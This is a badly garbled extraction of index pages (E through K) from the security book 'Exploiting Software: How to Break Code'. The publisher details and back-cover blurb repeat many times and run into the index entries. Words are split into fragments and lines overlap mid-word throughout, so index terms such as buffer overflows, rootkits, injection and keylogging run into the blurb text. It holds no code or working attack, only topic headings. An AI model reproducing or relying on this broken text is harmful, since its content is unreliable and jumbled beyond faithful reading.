[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] E- ma il at t achm ent s E- ma il inj ection 2nd 3rd 4t h ea_t ty pes EasyNews scr ipt s echo com man d Econom ic t hr eat sTable of Content s • EEPROM chips 2nd • I ndex burn in g oSoftw ut h ardware Expl oit ing a re How to Br e ak Code en abling read an d writ e f rom By Gr eg Hoglund , Gar y McGr aw in Et hernet cards 2nd 3rd 4t h man uf act urers of Pub Addison Wesley ser ialish l vs.er:parallel 2nd Pub tim ingDat in e: February 17, 200 4 Ef fect iv e Iaddresses, SBN: 0- 20 1str786 uct95 ure-8for EFTP server , overf Pages: 51 2low in Elect ron ic warf are Elev at ed priv ileg e problem 2nd 3rd 4t h elitewrap progr am EMBED t ags Em bedded script s 2nd

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Em bedded sy st em s fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? buf fer o verf lows in 2nd 3rd 4t h What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. fut u re of 2nd

in cellular pho nes Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Em ergent compu t at io n t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om En capsu la tion at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . fut u re of 2nd of OSs This m ust - h ave

book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he in m any hack ing book s, you w ill learn abou t

En s, m publish scrcrypt ipt ion k idalgorit die thm r eat en t ing f ound En d-u ser license agreement s (EULAs) En gine cont rol code

Why sof t w ar e ex ploit w2nd ill En um erat ing th reads a nd processes

con t inue t o be a ser ious p r oblem

En um SubKeys fu nct ion 2nd 3rd 4t h

When net w or k En vir onm en t variables

secur it y m ech anisms do n ot w or k

buf fer o verf low in 2nd 3rd

At terack ns3rd 4t h in serv softpat waret er 2nd En vir onm en t al eff ect s 2nd 3rd

Rev er se engineer in g

Equ iv alen t inpu t an d requ est s

API layer m apping for 2nd 3rd

Classic at t acks ag ainst serv er soft w ar e

charact er conv ersion in 2nd 3rd 4t h combin ed at t acks in 2nd

Sur pr ising at t acks ag ainst clien t soft war e

ghost characters in 2nd 3rd metTech a-ch aract erses in f2nd 3rdaft 4ting h niqu or cr

m aliciou s inpu t

on I DSs 2nd Er ror code in serv er ails sof t ware Thechtecking echn ical det of b uf fer

ov er f low s

Er ror h andlin g an d recov ery sy st em s 2nd Escape Root codesk it s in alt erna te en coding

Ex p i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak in lo API calls softinwlog ar files e. in sh ell com man d in ject ion 2nd met a-ch aract ers wit h in- band sign alin g 2nd 3rd 4t h Espio nage 2nd 3rd Et h er net card s, EEPROM in 2nd 3rd 4t h Et h er net scru bbing problem 2nd EULAs (end- user licen se agreem en t s) Excel, host fu nct ion in

Except ion han dling for buf fer ov er flow overwrit ing f rames for exec fu nct ion Ex ecut able code an d f iles dir ect access t o 2nd in n onex ecut able f iles

• •

in WI NNT 2nd

Table of Content s

single st epping fo r 2nd

I ndex

vs. source code Expl oit ing Softw a re How to Br e ak Code ex ecv fu nct ion By Gr ,eg Hoglund Exim overf low in , Gar y McGr aw Ex ist ing code in in ject ion vect ors Ex ploit , defin edAddison Wesley Pub lish er: Exploit s in ate: t ack pat tern17, s 2nd Pub Dat February 200 4 Ex posu re in open- sy st em s 2nd I SBN: 0- 20 1- 786 95 -8 Ex pression s Pages: 51 2 for inpu t pat h t racing 2nd in sh ell com man d in ject ion Ext ensibilit y of sof t ware 2nd 3rd 4t h Ext ernal bran ch in st ruct ion s on PA- RI SC Ext ernal inpu t in soft war e 2nd 3rd

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F ] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] F00 F bug Failure r eco very system s Failure Sim ulat ion Tool ( FST) 2nd False posit ives in whit e bo x analysis Fault in ject ion 2nd 3rd Fault -t oleran t syTable st ems of Content s • Fault s, lev era gin • Igndex Feedba even ts a re How to Br e ak Code Expl oitck ing Softw Felt en, Ed 2nd 3rd By Gr eg Hoglund , Gar y McGr aw Fenris to ol 2nd File han dles f or dr iv ers Pub lish er: AddisonmWesley File st reams specifier, isclassif icat io n in Pub Dat February 17, 200 4 File sy st em s e: 2nd Alch em I SBN: y Eye0-Net 20 1work 786 2nd 95 -8 dir ector y browsin Pages: 51 2 g 2nd filenam es in I nf ormix Dat abase in ject ion at t acks on 2nd tr aversal in 2nd user-supplied v ariables passed t o

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are File Tran sfer Prot ocol ( FTP) server s fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? att ack s on What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. buf fer o verf low in

code pat hs in 2nd

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d ghost characters wit h t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om f ilem on to ol at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Filen ames URLs replaced b y 2nd This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he XSS in scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Files cont rollable

Why hiding 2ndsof 3rdt w ar e

ex ploit w ill con t inue t o be a ser ious p r oblem

FileSy st em Object , at t ack s o n Filters

When net w or k secur it y m ech anisms do n ot w or k

drivers fo r 2nd

At t ack pat t er ns for com man ds for inpu t 2nd

Rev er se engineer in g

for serv er sof t ware inpu t in I DSs

Classic at t acks ag ainst serv er soft w ar e

in par sing

in sh ell com man d in ject ion

Sur pr ising at t acks ag ainst clien t soft war e

wit h bu ff er ov erflow Finan cial t hreat s es Tech niqu

f or cr aft ing m aliciou s inpu t

Firewalls as react t echnical ologydet ails Theive t echn

of b uf fer ov er f low s

for port scans lim itRoot at ion sk it ofs Firewalls an d I n t ern et Securit y ( Cheswick , Bellov in, an d Ru bin)

Ex p lo iet exp in gloitSatoion ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Firmwar soft arallel e. port in terru pt First w par First serial port in terr upt Fixed- size bu ff er s in st ack o verf low 2nd Flash RAM, det ect in g Flash ROM 2nd Flaws def ined in open -sy st ems v iew Float ing point u nit in terr upt

f log f unction Floppy disk cont roller in t err upt Flut t er ing win dows FML m ailin g list archive 2nd FnDebugDispat ch fu nct ion 2nd Font s, ex ecut able f OpenThread fun ct ion Fork ing processes



Table of Content s



I ndex

Form at st ring vulnerab ilit ies 2nd 3rd 4t h 5t h 6t h 7t h Form at tin g poison pills Expl oit ing Softw a re How to Br e ak Code Form s, t rust assum pt ions in By Gr eg Hoglund , Gar Forwards, in ject ion wityh McGr aw Foun dScan too l Fragm enlish t at er: io n Addison o f pack etWesley s Pub f rea dPub f unction Dat e: February 17, 200 4 Free build env ironm ent s I SBN: 0- 20 1- 786 95 -8 f ree fu nct ion Pages: 51 2 FreeBSD dist ribu tion address-ba sed arit hm et ic in 2nd buf fer o verf low in f reedom t o t ink er sit e FS regist er

How d oes sof tlawtion areToo brl)eak FST ( Failu re Simu 2nd? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ruProt sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? FTP ( File Transfer ocol) server s What t ools att ack s on can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. buf fer o verf low in

Ex code p lo i pat t inhsg inS o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d 2nd t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om ghost characters wit h at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Fun ct ion call nest ing Fun ct ion r et u rn addresses in bu ff er ov erflow at t ack s

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Fut ur e of sof t ware

lon g-t erm 2nd 3rd

medium -t erm 2nd 3rd short - termsof 2ndt w 3rd 5tploit h Why ar 4t e hex

w ill con t inue t o be a ser ious p r oblem

th reads in f write fu nct ion When

net w or k secur it y m ech anisms do n ot w or k

At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G ] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Gat es GDB to ol 2nd 3rd 4t h 5t h 6t h Gen eral pro blem s Gen eral regist ers in SPARC Gen eric ru les in inj ection vect ors Geo istr ibu of t edContent sy st emss • graphically dTable Geo • polit ics in indirect I ndexion GET s Expl request oit ing Softw a re How to Br e ak Code in PHP By Gr eg Hoglund , Gar y McGr aw segm ent ed get _f unc_qt y f unction Pub lish er: ed_ Addison get _user _defin prefixWesley f un ct ion 2nd Pub Dat e: February 17, 2nd 200 4 get Filenam eDialog f unct ion get n_f unIcSBN: f un ct0ion 20 1- 786 95 -8 Get Obj ect fu nct51 ion2 2nd Pages: get opt f un ction Get Pr ocAd dress f un ct io n get s f un ct io n Ghost characters 2nd 3rd glob fu nct ion

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Global of fset tab le (GOT) point ers fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Global variables What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. in bu ff er overf lo w at t ack s

in PHP 2nd 3rd Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d GlobalAlloc fu nct ion t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om GNU Mailm an, em bedd ed script s in at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . GOT (g lob al of fset t able) point ers Graphin This mgust - h ave

book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he soft twa re scr for iptreverse k id dieengineering t r eat m en f ound in m any hack ing book s, you w ill learn abou t phase space an alysis 2nd 3rd 4t h

Gray box analysis

Whyt pat sof ar e for inpu h tt w racing

ex ploit w ill con t inue t o be a ser ious p r oblem

for reverse engineering 2nd 3rd

When tnet or kersecur it y on Microsof SQLwServ 2nd 3rd

m ech anisms do n ot w or k

grep to ol

At t ack t er ns GroupWise, f ile tpat raversal in Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Hackers def ined Hackin g Expo sed (McClure, Scam bray , and Kurt z) 2nd 3rd 4t h 5t h Hailst orm too l 2nd 3rd Han dle inh eritan ce Har ion calls for payloads • d-coded fu nctTable of Content s Har 2nd 3rd • dware v irusesI ndex burn in g oSoftw ut h ardware Expl oit ing a re How to Br e ak Code chip det ect ion 2nd 3rd 4t h By Gr eg Hoglund , Gar y McGr aw CI H 2nd 3rd 4t h 5t h EEPROM in Pub er: Addison enlish abling read/ writWesley e f rom Pub Dat e: February Et hernet cards 2nd17, 3rd200 4t h4 man I SBN: uf act0urers 20 1-of 786 95 -8 ser ia l vs.51 parallel 2nd Pages: 2 rea din g a nd writin g h ardware mem ory 2nd 3rd 4t h 5t h 6t h 7t h 8t h Hash loa din g f or payloads 2nd Hay es modem pro tocol, reflect ion problem with Headers e- mail 2nd

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are for mem ory block s 2nd 3rd fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Heap ov er flows 2nd 3rd 4t h 5t h 6t h What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. HeapFree f un ct ion 2nd

helpct r. exe, rev ersing 2nd 3rd 4t h 5t h

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Hidin g t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om ack er iden t ity 2nd at t att ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . files an d direct ories 2nd 3rd processes This m ust - h ave

book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he s scr root ipt kit k idprogram die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t sto rage f iles High -pot ency at t acks in open- sy st em s view

Why sof t w ar e High land addresses

ex ploit w ill con t inue t o be a ser ious p r oblem

Hist ory of sof twar e 2nd 3rd 4t h

When net Holling swort h, Jef f w or k

secur it y m ech anisms do n ot w or k

Holodeck to ol

At t ackment patvariable t er ns HOME environ Hon eypo ts 2nd 3rd

Rev er se engineer in g

Hoo kin g [ See Call h ooking]

Hor de I MP, in ject ion wit h 2nd

Classic at t acks ag ainst serv er soft w ar e

host fu nct ion

Host- based fau lt inj ect or s

Sur pr ising at t acks ag ainst clien t soft war e

Hostile charact er sets Hostile Tech stat emniqu en t set ess f or

cr aft ing m aliciou s inpu t

HOSTNAME env iron ment va riable Hot fix es The

t echn ical det ails of b uf fer ov er f low s

Hot m ail, inj ect ion wit h Hou se of Root logick it s Howa rd, Mich ael 2nd

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak HPUX softbuf w fer ar e. o verf low in self -decrypt ing payloads on 2nd 3rd HSph ere, f ile t rav er sal in HTML escape codes for in ject ion wit h max size at t ribu te in HTTP cookies in 2nd

headers in query st rin gs in 2nd hu nt _a ddress f un ct ion 2nd 3rd 4t h 5t h



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] I LOVE YOU v irus 2nd 3rd I - Planet Serv er , decompiling 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h 11t h 12t h I ceCast MP3 Ser ver, URL en coding in I D m ode f or chip detect ion 2nd 3rd I DA ( I nt eract iv e Disassembler)



bat ch analysis wit h of 2nd 3rd 4t hs 5t h 6t h 7t h 8t h Table Content

g 2nd • for decomp ilin I ndex for inpu t pat h Expl oit ing Softwtaracing re How to Br e ak Code for map ping runt im e m em ory addresses By Gr eg Hoglund , Gar y McGr aw for part it ion analysis for signed/ unsign ed m isma tch es 2nd Pubwhit lisheer: Addison Wesley for box analysis Pub Datfor e: 2nd February plu gins 3rd 4t17, h 5t200 h 6t4h 7t h 8t h 9t h 10t h 11t h 12t h 13t h tr ackin I SBN: g wor0k 20 wit1h 786 95 -8 I DC script s 2nd51 3rd Pages: 2 4t h 5t h 6t h 7t h 8t h I DE chan nel in terr upt s 2nd I dent it y , hiding 2nd I DSs ( int rusion det ect ion sy stem s) alt ern at e encodin gs wit h 2nd as react iv e su bscript ion serv ices 2nd

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are signat ure- based v s. an oma ly - based 2nd fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? signat ures in What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. I DTs (I n terr upt Descript or Tables), h ook in g I Dv3 tag s

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d I I S Serv er t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om priv ileges in at t elev ackat, ed y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . unicode encoding s in IThis LoveYou virus m ust - h 2nd ave3rd book

m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he f ound in m any hack ing book s, you w ill learn abou t

Iscr m plicit assut rmpt ipt tkrust id die eation m en t I n inst ru ct ion I n regist ers in SPARC

sof t w ar e I n -ban dWhy sign als

ex ploit w ill con t inue t o be a ser ious p r oblem

C5 a tt ack exam ple 2nd

When w or secur for char act ernet inj ect io nk 2nd 3rd it y

m ech anisms do n ot w or k

hist ory of 2nd

t acke pat in crAt oss-sit scriptt er ingns 2nd 3rd 4t h 5t h ref lect io n wit h

Rev er se engineer in g

uses o f 2nd

wit h prin t ers 2nd

Classic at t acks ag ainst serv er soft w ar e

inclu de f unct ion

I n direction in at t ack pat t erns 2nd

Sur pr ising at t acks ag ainst clien t soft war e

inf o comm and 2nd inf o r egTech com man d 2nd niqu es f or

cr aft ing m aliciou s inpu t

I n form at ion warfa re (I W) 2nd 3rd 4t h I n form ix Dat tabase The echn ical

det ails of b uf fer ov er f low s

I n herit ance, perm ission init fun Root ct ion k it s I n ject ion

Ex charact p lo i t in S o3rd ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak er g2nd softcomm w ar and e. [ See Shell com m and inject ion ] e- mail 2nd 3rd 4t h on file sy st ems 2nd I n ject ion point s 2nd I n ject ion vect ors 2nd code address t arget s f or 2nd exist ing code in in at t ack pat tern s 2nd num ber r epr esen ta tion in

reg isters in 2nd I n put f iles, findin g I n put t racin g in rev erse eng in eer in g 2nd in serv er soft ware 2nd 3rd 4t h 5t h 6t h I n put / ou t put req uest pack et s ( I RPs) I n put s

• •

craft ed [ See Craf t ed inpu t ]

Table of Content s

in black box an alysis

I ndex

in open -sy st ems v iew Expl oit ing Softw a re How to Br e ak Code in par tit ion an alysis By Gr egout Hoglund , Garsy McGr aw I n sidebreak point I n st ruct ion point ers inPub MIlish PS er: processors Addison 2nd Wesley inPub ject Dat ion e: v ector s wit h 17, 2nd200 3rd4 February I n tel in t er rupt request archit ectu re 2nd 3rd I SBN: 0- 20 1- 786 95 -8 I n tellect ual propert y laws Pages: 51 2 I n telligence g ath ering 2nd 3rd I n telligent dev ices I n ter- space b ranch ing 2nd I n ter- space t ra mpolines I n teractiv e Disassem bler [ See I DA ( I nt eract iv e Disassembler) ]

How d oes w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are I n teractiv e sh sof ells t2nd ewalalls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Ifir n tern st at es What in sotftools ware can 2nd be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. mappin g 2nd

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d I n tern et t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om adopt ion rat e of at t conn ack ,ectyivit ouy m u st fir st lear n h ow r eal at t acks are really carr ied ou t . wit h [ See Con nect ivit y] securit y on

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

I n tern et Ex plorer

cont ent -b ased at t ack s o n dot less I P addresses in Get Ob ject sof ca ll tin Why w 2nd ar e

ex ploit w ill con t inue t o be a ser ious p r oblem

I n tern et t oast er I n terru pt Descript orwTables ( I DTs),ithyook g anisms When net or k secur minech

do n ot w or k

I n terru pt requ est (I RQ) ar chit ect ure 2nd 3rd I n terru pt Atst ack

pat t er ns

I DT hoo kin g

seu re engineer I RQRev archer itect 2nd 3rd in g Program mab le I nt erru pt Con tr ollers 2nd

Classic at tSyst acks I n tr usion Det ect ion em ag s ( Iainst DSs)

serv er soft w ar e

alt ern at e encodin gs wit h 2nd

Sur pr ising at t acks ag ainst clien t soft war e

as react iv e su bscript ion serv ices 2nd failures of

Tech niqu es f or cr aft ing m aliciou s inpu t

signat ure- based v s. an oma ly - based 2nd signat ures in

The t echn ical det ails of b uf fer ov er f low s

I n visibilit y of client s I n ward Root op eraktor it ss I P addresses

ern Ex alt p lo i tatiniveg S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak in at t ack soft w ar e. pat tern s I PSwit ch I ma il, blin d t ru st s in I RC. DLL for back t race code 2nd I RPs (in put / o ut put request packet s) I RQ ( int errup t request ) arch it ect u re 2nd 3rd I SO966 0 file sy st em I TS4 progra m I XI A t ool ix sso.q uery obj ect



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Ja va and .NET 2nd buf fer o verf low in 2nd 3rd byt e code disassem blers f or ex t ensibilit y of



securit y . [ SeeTable Securit Ja va] s of y, Content

Ja e (JVM) • va Virt ual Machin I ndex buf lows in How 2nd 3rd Expl oitfer ingo verf Softw a re to Br e ak Code en capsulat ion of By Gr eg Hoglund , Gar y McGr aw ex t ensibilit y of Ja vascript , aler t dialog a tt ack in PubI D lish er:deAddison JEDEC mo 2nd 3rdWesley Pub Dat e: fu February j edec_ read_id nct ion 17, 200 4 j edec_ read_m I SBN: fr0-fu20 nct 1-ion 786 95 -8 j edec_ reset fu nct Pages: 51ion 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] KeCancelTimer fu nct ion Ker nel buf fer o verf lows in rev erse eng in eer in g in fect ing imag es of



modif yin g

Table of Content s

pat ching 2ndI 3rd ndex4t h 5t h 6t h 7t h 8t h 9t h 10t h 11t h 12t h Ker nel roo tk it s 2nd Expl oit ing Softw a re How to Br e ak Code



building By Gr eg Hoglund , Gar y McGr aw check ed bu ild env ironm ent f or drivers fo r 2nd 3rd 4t h 5t h 6t h 7t h 8t h Pub lish files f or er: Addison Wesley Pub Dat writin g e: February 17, 200 4 Ker nel-mIode SBN:debu 0- 20 gger 1- 786 95 -8 KERNEL3 2. DLL 51 2 Pages: KeSet TimerEx fu nct ion KeSt allExecut ion Processor fu nct ion Key logging 2nd Key boar d bu ff er inj ect ion Key boar ds

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are cont roller chips for fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? in t er rupt s for 2nd What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. rea din g a nd writin g t o 2nd 3rd 4t h 5t h 6t h 7t h

Key st rok e m on it or s

